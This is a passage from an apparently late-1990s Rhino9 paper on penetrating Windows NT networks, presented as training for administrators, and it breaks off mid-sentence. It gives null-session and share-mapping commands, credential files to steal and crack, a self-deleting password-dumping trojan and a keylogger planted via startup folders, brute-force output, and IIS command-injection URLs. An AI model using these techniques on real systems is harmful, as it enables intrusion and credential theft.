|
Obviously, this paper will not contain all known methods for
NT network penetration. We have tried to put together a text that
Administrators can use to learn basic penetration techniques to test the
vulnerability of their own networks. If the concepts and techniques
presented in this text are absorbed and understood, an Administrator should
have a strong base knowledge of how penetrations occur and should be able to
build upon that knowledge to further protect their network.
This file is not meant for people that are new to security or NT or
networking technologies. The authors assume that people reading this
document have a certain understanding of protocols, server technologies and
network architectures.
The authors would like to continue expanding on this document and releasing
updated versions of it. We call upon all those that wish to contribute
techniques to send detailed information on your own penetration testing
methods. We would like to release updates to this document to keep it a
current and solid resource. Send your techniques or submissions to:
neonsurge@hotmail.com. Valid and useful submissions will be incorporated in
to the document with proper credit given to the author.
=
USAGE
=
The text is being written in a procedural manner. We have approached it much
like an intruder would actually approach a network penetration. Most of the
techniques discussed in this text are rather easy to accomplish once one
understands how and why something is being done.
The document is divided into 3 sections: NetBIOS, WebServer, and
Miscellaneous, each of which explain different methods of information
gathering and penetration techniques.
=
INFORMATION GATHERING AND PENETRATION VIA NETBIOS
=
The initial step an intruder would take is to portscan the target machine or
network. It's surprising how methodical an attack can become based on the
open ports of a target machine. You should understand that it is the norm
for an NT machine to display different open ports than a Unix machine.
Intruders learn to view a portscan and tell wether it is an NT or Unix
machine with fairly accurate results. Obviously there are some exceptions to
this, but generally it can be done. Recently, several tools have been
released to fingerprint a machine remotely, but this functionality has not
been made available for NT.
When attacking an NT based network, NetBIOS tends to take the brunt of an
attack. For this reason, NetBIOS will be the first serious topic of
discussion in this paper.
Information gathering with NetBIOS can be a fairly easy thing to accomplish,
albeit a bit time consuming. NetBIOS is generally considered a bulky
protocol with high overhead and tends to be slow, which is where the
consumption of time comes in.
If the portscan reports that port 139 is open on the target machine, a
natural process follows. The first step is to issue an NBTSTAT command.
The NBTSTAT command can be used to query network machines concerning NetBIOS
information. It can also be useful for purging the NetBIOS cache and
preloading the LMHOSTS file. This one command can be extremely useful when
performing security audits. Interpretation the information can reveal more
than one might think.
Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s]
[interval]
Switches -a Lists the remote computer's name table given its host name.
-A Lists the remote computer's name table given its IP address.
-c Lists the remote name cache including the IP addresses.
-n Lists local NetBIOS names.
-r Lists names resolved by broadcast and via WINS.
-R Purges and reloads the remote cache name table.
-S Lists sessions table with the destination IP addresses.
-s Lists sessions table conversions.
The column headings generated by NBTSTAT have the following meanings:
Input
Number of bytes received.
Output
Number of bytes sent.
In/Out
Whether the connection is from the computer (outbound) or from another
system to
the local computer (inbound).
Life
The remaining time that a name table cache entry will "live" before your
computer
purges it.
Local Name
The local NetBIOS name given to the connection.
Remote Host
The name or IP address of the remote host.
Type
A name can have one of two types: unique or group.
The last byte of the 16 character NetBIOS name often means something because
the same name can be present multiple times on the same computer. This shows
the last byte of the name converted into hex.
State
Your NetBIOS connections will be shown in one of the following "states":
State Meaning
Accepting An incoming connection is in process.
Associated The endpoint for a connection has been created and your computer
has associated it with an IP address.
Connected This is a good state! It means you're connected to the remote
resource.
Connecting Your session is trying to resolve the name-to-IP address mapping
of the destination resource.
Disconnected Your computer requested a disconnect, and it is waiting for the
remote computer to do so.
Disconnecting Your connection is ending.
Idle The remote computer has been opened in the current session, but is
currently not accepting connections.
Inbound An inbound session is trying to connect.
Listening The remote computer is available.
Outbound Your session is creating the TCP connection.
Reconnecting If your connection failed on the first attempt, it will display
this state as it tries to reconnect.
Here is a sample NBTSTAT response of an actual machine:
C:\>nbtstat -A x.x.x.x
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
DATARAT <00> UNIQUE Registered
R9LABS <00> GROUP Registered
DATARAT <20> UNIQUE Registered
DATARAT <03> UNIQUE Registered
GHOST <03> UNIQUE Registered
DATARAT <01> UNIQUE Registered
MAC Address 00-00-00-00-00-00
Using the table below, what can you learn about the machine?
Name Number Type Usage
=
<computername> 00 U Workstation Service
<computername> 01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
<computername> 03 U Messenger Service
<computername> 06 U RAS Server Service
<computername> 1F U NetDDE Service
<computername> 20 U File Server Service
<computername> 21 U RAS Client Service
<computername> 22 U Exchange Interchange
<computername> 23 U Exchange Store
<computername> 24 U Exchange Directory
<computername> 30 U Modem Sharing Server Service
<computername> 31 U Modem Sharing Client Service
<computername> 43 U SMS Client Remote Control
<computername> 44 U SMS Admin Remote Control Tool
<computername> 45 U SMS Client Remote Chat
<computername> 46 U SMS Client Remote Transfer
<computername> 4C U DEC Pathworks TCPIP Service
<computername> 52 U DEC Pathworks TCPIP Service
<computername> 87 U Exchange MTA
<computername> 6A U Exchange IMC
<computername> BE U Network Monitor Agent
<computername> BF U Network Monitor Apps
<username> 03 U Messenger Service
<domain> 00 G Domain Name
<domain> 1B U Domain Master Browser
<domain> 1C G Domain Controllers
<domain> 1D U Master Browser
<domain> 1E G Browser Service Elections
<INet~Services> 1C G Internet Information Server
<IS~Computer_name> 00 U Internet Information Server
<computername> [2B] U Lotus Notes Server
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a
network device, multiple occurences of a single name may appear to be
registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces
on the same computer, this configuration is necessary to permit the
registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used
to manage WinNT domain names.
Domain Name (D): New in NT 4.0.
An intruder could use the table above and the output from an nbtstat against
your machines to begin gathering information about them. With this
information an intruder can tell, to an extent, what services are running on
the target machine and sometimes what software packages have been installed.
Traditionally, every service or major software package comes with it's share
of vulnerabilities, so this type of information is certainly useful to an
intruder.
The next logical step would be to glean possible usernames from the remote
machine. A network login consists of two parts, a username and a password.
Once an intruder has what he knows to be a valid list of usernames, he has
half of several valid logins. Now, using the nbtstat command, the intruder
can get the login name of anyone logged on locally at that machine. In the
results from the nbtstat command, entries with the <03> identifier are
usernames or computernames. Gleaning usernames can also be accomplished
through a null IPC session and the SID tools (For more information about the
SID tools, read appendix B).
The IPC$ (Inter-Process Communication) share is a standard hidden share on
an NT machine which is mainly used for server to server communication. NT
machines were designed to connect to each other and obtain different types
of necessary information through this share. As with many design features in
any operating system, intruders have learned to use this feature for their
own purposes. By connecting to this share an intruder has, for all technical
purposes, a valid connection to your server. By connecting to this share as
null, the intruder has been able to establish this connection without
providing it with credentials.
To connect to the IPC$ share as null, an intruder would issue the following
command from a command prompt:
c:\>net use \\[ip address of target machine]\ipc$ "" /user:""
If the connection is successful, the intruder could do a number of things
other than gleaning a user list, but lets start with that first. As
mentioned earlier, this technique requires a null IPC session and the SID
tools. Written by Evgenii Rudnyi, the SID tools come in two different parts,
User2sid and Sid2user. User2sid will take an account name or group and give
you the corresponding SID. Sid2user will take a SID and give you the name of
the corresponding user or group. As a stand alone tool, this process is
manual and very time consuming. Userlist.pl is a perl script written by
Mnemonix that will automate this process of SID grinding, which drastically
cuts down on the time it would take an intruder to glean this information.
At this point, the intruder knows what services are running on the remote
machine, which major software packages have been installed (within limits),
and has a list of valid usernames and groups for that machine. Although this
may seem like a ton of information for an outsider to have about your
network, the null IPC session has opened other venues for information
gathering. The Rhino9 team has been able to retrieve the entire native
security policy for the remote machine. Such things as account lockout,
minimum password length, password age cycling, password uniqueness settings
as well as every user, the groups they belong to and the individual domain
restrictions for that user - all through a null IPC session. This
information gathering ability will appear in Rhino9's soon to be released
Leviathan tool. Some of the tools available now that can be used to gather
more information via the IPC null session will be discussed below.
With the null IPC session, an intruder could also obtain a list of network
shares that may not otherwise be obtainable. For obvious reasons, an
intruder would like to know what network shares you have available on your
machines. For this information gathering, the standard net view command is
used, as follows:
c:\>net view \\[ip address of remote machine]
Depending on the security policy of the target machine, this list may or may
not be denied. Take the example below (ip address has been left out for
obvious reasons):
C:\>net view \\0.0.0.0
System error 5 has occurred.
Access is denied.
C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.
C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0
Share name Type Used as Comment
-------------------------------------------------------------------------------
Accelerator Disk Agent Accelerator share for Seagate backup
Inetpub Disk
mirc Disk
NETLOGON Disk Logon server share
www_pages Disk
The command completed successfully.
As you can see, the list of shares on that server was not available until
after the IPC null session had been established. At this point you may begin
to realize just how dangerous this IPC connection can be, but the IPC
techniques that are known to us now are actually very basic. The
possibilities that are presented with the IPC share are just beginning to be
explored.
The release of the WindowsNT 4.0 Resource Kit made a new set of tools
available to both administrator and intruder alike. Below is a description
of some of the Resource Kit Utilities that the Rhino9 team has used in
conjunction with the IPC$ null session to gather information. When reading
these tool descriptions and the information they provide, keep in mind that
the null session that is used does NOT provide the remote network with any
real credentials.
UsrStat: This command-line utility displays the username, full name, and
last logon date and time for each user in a given Domain. Below is an actual
cut and paste of this tool used through a null IPC session against a remote
network:
C:\NTRESKIT>usrstat domain4
Users at \\STUDENT4
Administrator - - logon: Tue Nov 17 08:15:25 2000
Guest - - logon: Mon Nov 16 12:54:04 2000
IUSR_STUDENT4 - Internet Guest Account - logon: Mon Nov 16 15:19:26 2000
IWAM_STUDENT4 - Web Application Manager account - logon: Never
laurel - - logon: Never
megan - - logon: Never
In order to fully understand what is happening in the capture, lets discuss
it. Before the actual attack took place, a mapping was put into the lmhosts
file that reflected the Student4 machine and it's Domain activity status
using the #PRE/#DOM tags (explained in more detail below.). The entry was
then preloaded into the NetBIOS cache, and a null IPC session was
established. As you can see, the command is issued against the Domain name.
The tool will then query the Primary Domain Controller for that Domain.
Global: This command-line utility displays the members of global groups on
remote servers or domains. As discussed above, this utility is used in
conjunction with an Lmhosts/IPC mapping. Shown below is an actual capture of
the global tool. In the example, the "Domain Users" is a standard, default
global group present in a WindowsNT domain. For this example, we have used
the tool to query Domain1 for a listing of all users in the "Domain Users"
group.
C:\>global "Domain Users" domain1
Bob
SPUPPY$
BILLY BOB$
Bill
IUSR_BILLY BOB
IWAM_BILLY BOB
IUSR_SPUPPY
IWAM_SPUPPY
Local: The Local tool works just as the Global tool does, except it queries
the machine for the members of a local group instead of a global group.
Below is an example of the Local tool querying a server for a list of its
Administrators group.
C:\>local "administrators" domain1
Bob
Domain Admins
Bill
NetDom: NetDom is a tool that will query a server for its role in a domain,
as well as querying the machine for its PDC. The NetDom tool also works with
an Lmhosts/IPC mapping. Below is a capture of the tool and its standard
output:
Querying domain information on computer \\SPUPPY ...
The computer \\SPUPPY is a domain controller of DOMAIN4.
Searching PDC for domain DOMAIN4 ...
Found PDC \\SPUPPY
The computer \\SPUPPY is the PDC of DOMAIN4.
NetWatch: NetWatch is a tool that will give the person invoking the tool a
list of the shares on a remote machine. Again, this tool works with an
Lmhosts/IPC mapping. The bad thing about this tool is that the Rhino9 team
was able to use the tool to retrieve a list of the hidden shares on the
remote machine.
Other known penetration techniques that involve the IPC share include
opening the registry of the remote machine, as well as a remote User Manager
for Domains technique. The IPC null connection could allow an intruder to
potentially gain access to your registry. Once the null IPC session has been
established, the intruder would launch his local regedit utility and attempt
the Connect Network Registry option. If this is succesful, the intruder
would have read access to certain regsitry keys, and potentially read/write.
Regardless, even read access to the registry is undesirable from a security
standpoint.
An intruder could also attempt the IPC User Manager for Domains technique.
This technique is relatively unknown and often times produces no results. We
are covering it because it can produce results and it can be an effective
intrusion technique. This technique involves a null IPC session and entries
into the LMHOSTS file. The LMHOSTS file is (normally) a local file kept on
windows based machines to map NetBIOS names to IP addresses. Used mostly in
non-WINS environments, or on clients unable to use WINS, the LMHOSTS file
can actually be used in many different ways by an intruder. Different uses
for the LMHOSTS file will be discussed later in this text, for now we will
discuss how the LMHOSTS file is used in this technique.
This is an excellent technique to discuss because it shows how one of the
previous techniques is used in conjunction with this one to accomplish a
goal. Beginning with a portscan, and assuming that port 139 is open, the
attacker would issue an nbtstat command. The intruder would then glean the
NetBIOS name of the remote machine from the nbtstat results. Lets look at
the same sample nbtstat results from above:
C:\>nbtstat -A x.x.x.x
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
DATARAT <00> UNIQUE Registered
R9LABS <00> GROUP Registered
DATARAT <20> UNIQUE Registered
DATARAT <03> UNIQUE Registered
GHOST <03> UNIQUE Registered
DATARAT <01> UNIQUE Registered
MAC Address 00-00-00-00-00-00
By examining the results of the nbtstat command, we are looking for the <03>
identifier. If someone is logged on locally on the machine, you will see two
<03> identifiers. Normally the first <03> listed is the netbios name of the
machine and the second <03> identifier listed is the name of the locally
logged on user. At this point the intruder would put the netbios name and ip
address mapping of the machine into his local LMHOSTS file, ending the entry
with the #PRE and #DOM tags. The #PRE tag denotes that the entry should be
preloaded into the netbios cache. The #DOM tag denotes domain activity. At
this point the intruder would issue a nbtstat -R command to preload the
entry into his cache. Technically, this preloading would make the entry
appear as if it had been resolved by some previous network function and
allow the name to be resolved much quicker.
Next the intruder would establish a null IPC session. Once the null IPC
session has been succesfully established, the intruder would launch his
local copy of User Manager for Domains and use the Select Domain function in
User Manager. The Domain of the remote machine will appear (or can manually
be typed in) because it has been pre-loaded into the cache. If the security
of the remote machine is lax, User Manager will display a list of all the
users on the remote machine. If this is being done over a slow link (i.e.
28.8 modem) it will normally not work. On faster network connections
however, this tends to produce results.
Now that the intruder has gathered information about your machine, the next
step would be to actually attempt a penetration of that machine. The first
penetration technique to be discussed will be the open file share attack.
The intruder would couple the previously discussed net view command with a
net use command to accomplish this attack.
Taking the net view from above, lets discuss the attack.
C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0
Share name Type Used as Comment
-------------------------------------------------------------------------------
Accelerator Disk Agent Accelerator share for Seagate backup
Inetpub Disk
mirc Disk
NETLOGON Disk Logon server share
www_pages Disk
The command completed successfully.
Once the attacker has a list of the remote shares, he could then attempt to
map to a remote share. An example of the command structure for the attack
would be:
c:\>net use x: \\0.0.0.0\inetpub
This attack will only work if the share is unpassworded or shared out to the
everyone group (NOTE: The Everyone group means Everyone. If someone connects
as a null user, they are now part of the everyone group.). If those
parameters are in place, the attacker would be able to map a network drive
to your machine and begin what could amount to a severe series of
penetration attacks. Keep in mind that the intruder is not limited to
mapping drives to the shares displayed by the net view command. An intruder
that knows NT or has done his homework knows that NT has hidden
administrative shares. By default, NT creates the IPC$ share and one hidden
share for every drive on the machine (i.e. a machine that has C, D, and E
drives would have corresponding hidden shares of C$, D$, and E$). There is
also a hidden ADMIN$ share that maps directly to the installation path of NT
itself (i.e. If you installed NT on C:\winnt, than ADMIN$ maps to that exact
portion of that drive). One thing that the Rhino9 team has noticed about the
majority of the NT security community is that they seem to be oblivious to
the concept of penetrating one internal NT machine from another internal NT
machine. The Rhino9 team, during our professional audits, has accomplished
this task many times. Chances are, if the intruder is good and can gain
access to one of your machines, he will worm his way into the rest of your
network. For that reason, these share attacks can pose a serious threat.
(As a side note, the Rhino9 team was once contacted to perform a remote
penetration audit for one of the largest ISP's in Florida. We gained access
to a share on one of the technician's personal machines, and from there
gained access to the entire network. It can be done.)
At first, someone may not be able to see the dangers of someone having
access to your hard drive. Access to the hard drive opens up new avenues for
Information Gathering and Trojan/Virus planting. An attacker would normally
look for something that could possibly contain a password or highly
sensitive data that he could use to continue digging his way into your
network. Some of the files that a intruder will look for and use are listed
below, each with a brief description of what it is, and how it would be
used.
Eudora.ini: This file is used to store configuration information for eudora
e-mail software. An easily obtainable tool called eudpass.com will extract
the individuals username and password information as well as all the
information that the attacker needs to begin eavesdropping on the users
mail. At this point, the intruder could configure his own e-mail software to
read the targets mail. Again, some could have a hard time seeing the dangers
in this, but remember that generally, people are creatures of habit. The
chances that the user's e-mail password is the same password they use to log
into the network at work are relatively high. Now all the attacker needs to
do is keep snooping around on the users hard drive for a resume or some
other work related document to point him in the direction of the persons
place of business, allowing him to launch a somewhat strong initial strike
against the network.
Tree.dat: This is the file that is used by the popular software CuteFTP to
store the users ftp site/username/password combinations. Using a program
called FireFTP, the attacker can easily crack the tree.dat file. So, as
above, the user could keep gathering information about you and launch an
attack against your place of business. Not to mention that if you have an
ftp mapping in your tree.dat that maps directly to your place of business,
his attack has now become much easier.
PWL: PWL's generally reside on Win95 machines. They are used to store
operation specific passwords for the Windows95 end user. A tool called
glide.exe will crack (with less than desirable efficiency) PWL files. There
is also documentation available on how to manually crack the encryption of
these PWL files using a calculator. Continuing the scenario, the attacker
could keep gathering information about the user and formulate an attack.
PWD: PWD files exist on machines running FrontPage or Personal Webserver.
These files include the plain text username and an encrypted password
matching the credentials needed to administer the website. The encryption
scheme used for these passwords is the standard DES scheme. Needless to say,
many DES cracking utilities are available on the internet. John the Ripper
by Solar Designer very efficiently cracks these passwords.
WS_FTP.ini: This ini file exists on machines using ws_ftp software. Although
an automated password extractor for this file has just recently been
introduced into the security community, the encryption mechanism used is not
very strong. The password is converted to hex numbers (2 digits). If a digit
is at the N position, then N is added to the digit. Reverse the process and
you have cracked this encryption scheme. (This is also known to sometimes
work for cracking PMail.ini - Pegasus Mail and Prefs.js - Netscape.)
IDC Files: IDC (internet database connecter) files are normally used for
back-end connectivity to databases from a webserver. Becuase this type of
connection generally requires authentication, some IDC files contain
username/password combinations, often times in clear text.
waruser.dat: This is one of the config files for WarFTP, the popular Win32
FTP server. This particular dat file could contain the administrative
password for the FTP server itself. From what the authors have been able to
find out, this only occurs in beta versions of WarFTP 1.70.
$winnt$.inf: During an unattended installation of WindowsNT, the setup
process requires information files. As residue of this unattended
installation process, a file called $winnt$.inf could exist in the %systemroot%\system32
directory. This file could contain the username and password combination of
the account that was used during the installation. Because the account used
in these types of installations normally require some strong permission sets
on the network, this is not a trivial matter.
Sam._: Although people have known for a long time that the SAM database
could present a problem if it fell into the wrong hands, many people forget
about the sam._. Many would-be intruders have asked themselves how they
could copy the SAM database if they could mount a drive across the net.
Well, normally this is not possible, because the NT server you are connected
to is running, and while it is running, it locks the SAM. However, if the
administrator has created an emergency repair disk, a copy of the SAM should
be located in the %systemroot%\repair\ directory. This file will be named
sam._. This copy, by default is EVERYONE readable. By using a copy of the
samdump utility, you can dump username/password combinations from the copied
SAM.
ExchVerify.log: The ExchVerify.log file is created by Cheyenne/Innoculan/ArcServe.
Normally created by the installation of the Cheyenne/Innoculan/ArcServe
software, this file resides at the root of the drive where the software
installation took place. This file can contain extremely sensitive
information, as shown below:
<EXCH-VERIFY>: ExchAuthenticate() called with
NTServerName:[SAMPLESERVER]
NTDomainName[SAMPLESERVER] adminMailbox:[administrator]
adminLoginName:[administrator]
password:[PASSWORD]
Needless to say, the file contains information that an intruder could easily
use to further compromise the integrity of your network.
Profile.tfm: Profile.tfm is a file that is created by the POP3 client
software AcornMail. At the writing of this document, AcornMail began getting
alot of attention from the internet community. Upon inspection of the
software, we found that it's an efficient POP3 client, but the installation
is not NTFS friendly. After the installation of the software, we began to
check into the files that AcornMail created. We found that the Profile.tfm
file held the username/password combination. At first, we decided the
software was somewhat ok, because it did indeed store the password in an
encrypted state. We then realized that the permissions on the profile.tfm
file were set to Everyone/Full Control. This causes problems because anyone
could obtain a copy of the file and plug this file into their own AcornMail
installation. Then intruder coud log on with the stored information. Below
is a capture in Network Monitor of just that.
00000000 00 01 70 4C 67 80 98 ED A1 00 01 01 08 00 45 00 ..pLg.........E.
00000010 00 4A EA A7 40 00 3D 06 14 88 CF 62 C0 53 D1 36 .J..@.=....b.S.6
00000020 DD 91 00 6E 04 44 F6 1E 84 D6 00 32 51 EB 50 18 ...n.D.....2Q.P.
00000030 22 38 64 9E 00 00 2B 4F 4B 20 50 61 73 73 77 6F "8d...+OK.Passwo
00000040 72 64 20 72 65 71 75 69 72 65 64 20 66 6F 72 20 rd.required.for.
00000050 68 6B 69 72 6B 2E 0D 0A jjohn...
00000000 98 ED A1 00 01 01 00 01 70 4C 67 80 08 00 45 00 ........pLg...E.
00000010 00 36 A4 02 40 00 80 06 18 41 D1 36 DD 91 CF 62 .6..@....A.6...b
00000020 C0 53 04 44 00 6E 00 32 51 EB F6 1E 84 F8 50 18 .S.D.n.2Q.....P.
00000030 21 AC 99 90 00 00 50 41 53 53 20 67 68 6F 73 74 !.....PASS.xerox
00000040 37 33 0D 0A 63..
As you can see, the username/password is indeed passed in clear text. This
is not a fault of AcornMail, but something that has been present in the
POPvX. This 'data' file swapping/packet sniffing type of technique has been
tested by the Rhino9 team on numerous software titles, so this attack is not
limited to AcornMail.
Now that we have discussed the files an intruder may wish to acquire if he
gains access to your hard drive, lets discuss Trojan planting. If there is
one thing that can gain an attacker a ton of information, it is trojan
planting. The open file share attack generally makes trojan planting
extremely easy to do. One of the easiest and most informative trojans to use
is the PWDUMP utility wrapped in a batch file. If prepared correctly, the
batch file will execute minimized (also named something clever, such as
viruscan.cmd), run the PWDUMP utility, delete the PWDUMP utility after it
has run its course, and finally erase itself. This generally leaves little
evidence and will create a nice text file of all of the username/password
combinations on that machine.
Rules of the trick: The target must be an NT machine and the end user
executing the trojan must be the administrator, so the attacker drops the
batch file into the Administrators start-up folder and waits. The next time
the Administrator logs in to the machine, the batch file executes and dumps
the username/password combinations. Then the attacker connects back into the
machine via file sharing and collects the results.
Another solid attack an intruder might try is to place a keylogger batch
into the start-up folder. This can usually be done to any user, not just the
administrator. This will glean all keystrokes issued by that user, minus
initial logon credentials (due to the NT architecture, which stops all user
mode processes during login). The attacker then connects back to the target
machine at a later time and collects the recorded keystrokes.
One of the deadliest trojan attacks issued is a batch file that runs as
Administrator and sets up a scheduled event using the AT command. Because
the AT command can execute as System, it can create copies of the SAM
database and the registry. Imagine the fun an attacker can have with that
one.
How does one prevent such attacks? By not sharing items to the everyone
group, and by enforcing strong password schemes in your environment. If an
intruder comes across a server that prompts him for credentials at every
turn, chances are the intruder will become frustrated and leave. Other, more
persistant intruders, will continue on with a Brute Force Attack.
Undoubtedly the most common tool for Brute Force NetBIOS attacks is NAT. The
NAT (NetBIOS Auditing Tool) tool will allow a user to automate network
connection commands using a list of possible usernames and passwords. NAT
will attempt to connect to the remote machine using every username and every
password in the lists provided. This can be a lengthy process, but often
times an attacker will use a shortened list of common passwords and call it
quits. An accomplished intruder will construct his list of usernames by
using the information gathering techniques discussed above. The password
list the intruder will use will also be constructed from gleaned
information. Starting with a bare bones list of passwords, and creating the
rest based on the usernames. It comes as no surprise to security
professionals to find passwords set to the username.
An attacker can specify an IP addresses to attack or he can specify an
entire range of IP addresses. NAT will diligently work to accomplish the
task, all the while generating a formatted report.
Below is an actual results file of a real NAT attack across the internet.
Although permission was given for the Rhino9 team to perform this attack,
the IP address has been changed to protect the test target.
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: 0.0.0.0
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Tue Oct 14 11:33:46 1997
[*]--- Timezone is UTC-4.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`ADMINISTRATOR'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`GUEST'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ROOT'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`ADMIN'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`PASSWORD'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `PASSWORD'
[*]--- Obtained server information:
Server=[AENEMA] User=[] Workgroup=[STATICA] Domain=[]
[*]--- Obtained listing of shares:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
D$ Disk: Default share
E$ Disk: Default share
HPLaser4 Printer: HP LaserJet 4Si
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
print$ Disk: Printer Drivers
[*]--- This machine has a browse list:
Server Comment
--------- -------
AENEMA
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- WARNING: Able to access share: \\*SMBSERVER\D$
[*]--- Checking write access in: \\*SMBSERVER\D$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\D$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\D$
[*]--- Attempting to access share: \\*SMBSERVER\E$
[*]--- WARNING: Able to access share: \\*SMBSERVER\E$
[*]--- Checking write access in: \\*SMBSERVER\E$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\E$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\E$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\print$
[*]--- WARNING: Able to access share: \\*SMBSERVER\print$
[*]--- Checking write access in: \\*SMBSERVER\print$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\print$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\print$
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
If you look closely at the results, you can clearly see the CONNECTED
message which informs the attacker that the tool found a valid
Username/Password combination. At this point, the intruder would just
manually re-connect to that machine using the newly found username/password
combination and launch his attack.
This is the end of the remote penetration via NetBIOS section. Keep in mind
that the techniques discussed above are neither static nor stand-alone. An
intruder who has spent time learning how to penetrate NT based networks will
become extremely creative and use not only the techniques above, but
personal variations of those techniques.
=
INFORMATION GATHERING AND PENETRATION VIA WEBSERVER
=
Information gathering and remote penetration via a webserver is well known
today due to the population explosion on the internet and the resulting
dissemenation of information. When discussing remote penetration and
information gathering on NT Webservers, we will focus on Internet
Information Server, the webserver that comes bundled with NT4.
Some of the information to be discussed will be somewhat outdated. We have
included it due to the fact that during professional audits, the Rhino9 Team
has come across companies that are still running older versions of software
titles in their production environments.
Lets begin by discussing information gathering techniques. We will discuss
ways of getting information about the webserver under attack, as well as
using the webserver to get information that could be used in other types of
attacks.
First we will discuss how one would retrieve the webserver software package
and version on the target machine. Someone that is new to the security
community might wonder why one would want the webserver version of the
target machine. Every different version and distribution of software has
different vulnerabilities attached to them. For this reason, an intruder
would want to know the webserver software and version in question.
The oldest technique used to acquire webserver software and version is to
telnet to the target machine on the HTTP port. Once a telnet connection has
been established, issuing a simple GET command would allow one to view the
HTTP header information, which would include the webserver software and
version being used.
One who is not prone to using telnet, or does not wish to parse through the
header information can use a couple of available tools. The first, and
probably most popular tool amongst non-accomplished intruders is Netcraft.
An intruder can visit www.netcraft.com and use their query engine to
retrieve the webserver information from the remote target. Netcraft can also
be used retrieve all known webserver hostnames. For example, if we wanted to
find all of the webservers that belong to the someserver.com domain, we
could use Netcraft's engine to query *.someserver.com, and it would return a
listing of all of the webserver hosts in that domain. Other tools that can
be used to retrieve webserver version include 1nf0ze by su1d and Grinder by
horizon of Rhino9 (URLs to all tools discussed in this text can be found at
the end of this document).
Once the intruder has determined what webserver package he is up against, he
can begin to formulate an attack plan. By using the techniques discussed
below, the intruder could gain access to the server or gain information from
the server to use in other attacks. Understand that this section is in no
way a complete representation of all attacks, just the more common and well
known ones.
The first attack to be covered is the .bat/.cmd flaw. As this flaw was well
documented with its public posting, it will be quoted below (author unknown,
if the author is reading this, let me know so that proper credit can be
given):
<Quote>
The .bat and .cmd BUG is a well-known bug in Netscape server and described
in the WWW security FAQ Q59. The implementation of this bug in Internet
Information Server beats all scores.
Let's consider fresh IIS Web server installation where all settings are
default:
1) CGI directory is /scripts
2) There are no files abracadabra.bat or abracadabra.cmd in
the /scripts directory.
3) IIS Web server maps .bat and .cmd extensions to cmd.exe.
Therefore registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap
has the following string:
.bat or .cmd=C:\WINNT35\System32\cmd.exe /c %s %s
In this case a hacker with a malicious intent can send either one of the two
command lines to the server:
a) /scripts/abracadabra.bat?&dir+c:\+?&time
b) /scripts/abracadabra.cmd?&dir+c:\+?&time
and the following happens:
1) Browser asks how you want to save a document. Notepad.exe
or any other viewer would do for this "type" of
application.
2) Browser starts the download session. The download window
appears on the screen.
3) The hacker clicks the "cancel" button on the download
window, because the "time" command on the server never
terminates.
4) Nothing is logged on the server side by the IIS Web
server, because the execution process was not successfully
terminated!!! (Thanks to the "time" command.) The only
way to see that something happened is to review all your
NT security logs. But they do not contain information
like REMOTE_IP. Thus the hacker's machine remains fully
anonymous.
Let's resume:
1) IIS Web server allows a hacker to execute his "batch file"
by typing
/scripts/abracadabra.bat?&COMMAND1+?&COMMAND2+?&...+?&COMMANDN
In a similar situation with the Netscape server, only
